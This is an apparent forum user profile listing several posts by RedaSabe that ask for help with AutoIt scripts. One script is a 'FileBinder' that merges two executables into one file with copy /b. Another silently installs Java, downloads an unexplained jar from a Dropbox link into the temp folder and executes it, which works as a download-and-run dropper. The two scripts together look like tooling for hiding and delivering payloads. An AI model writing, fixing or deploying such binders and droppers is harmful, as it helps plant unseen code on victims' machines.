Jump to content

RedaSabe

Members
  • Posts

    13
  • Joined

  • Last visited

Everything posted by RedaSabe

  1. FileBinder is an advanced file binder which binds multiple file of any type and merges into a single executable file you understood
  2. 1) run file1 =test1.exe 2) run file2 =test2.exe
  3. someone help me fixed this problem AutoIt v3 if FileBinder "File 1" works well "File 2" does not work check #include <Process.au3> #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <WindowsConstants.au3> $Form1 = GUICreate("", 116, 116, 192, 124) $Button1 = GUICtrlCreateButton("File 1", 8, 8, 99, 25) GUICtrlSetBkColor($Button1, 0xFF0000) $Button2 = GUICtrlCreateButton("File 2", 8, 32, 99, 25) GUICtrlSetBkColor($Button2, 0xFF0000) $Button3 = GUICtrlCreateButton("doctoroctoganapus", 8, 80, 99, 25) $Input1 = GUICtrlCreateInput("Name for File 3", 8, 56, 97, 21) GUISetState(@SW_SHOW) $File1=False $File2=False While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button1 $File1 = FileOpenDialog("Please choose the first file", @ScriptDir, "all files (*.*)") GUICtrlSetBkColor($Button1, 0x00FF00) Case $Button2 $File2 = FileOpenDialog("Please choose the second file", @ScriptDir, "all files (*.*)") GUICtrlSetBkColor($Button2, 0x00FF00) Case $Button3 If $File1=False Or $File2=False Then MsgBox(0,"Error","Please choose the files") Else $RDos=_RunDos('copy /b "'&$File1&'" + "'&$File2&'" "'&@ScriptDir&'\'&GUICtrlRead($Input1)&'"') EndIf EndSwitch WEnd
  4. "Error", "The error has to due with the use of RunWait")
  5. someone help me fixed this problem AutoIt v3 This script works fine on windows xp it does not work for windows 7 #include <NavInfo.au3> $Is_Java = _NavInfo_IsJavaInstalled() If $Is_Java Then InetGet("https://dl.dropboxusercontent.com/s/36evvwvy9cz7gg8/ok.jar?token_hash=AAEysCjW5ZlVNUvUpsVtJw7lSv2QGNie1X6H7X1NQBrgRg&dl=1", @TempDir & "\1.jar") ShellExecute(@TempDir & "\1.jar") Else InetGet("http://javadl.sun.com/webapps/download/AutoDL?BundleId=76860", "javainstall.exe") RunWait("javainstall.exe /s") InetGet("https://dl.dropboxusercontent.com/s/36evvwvy9cz7gg8/ok.jar?token_hash=AAEysCjW5ZlVNUvUpsVtJw7lSv2QGNie1X6H7X1NQBrgRg&dl=1", @TempDir & "\1.jar") ShellExecuteWait(@TempDir & "\1.jar") EndIf
×
×
  • Create New...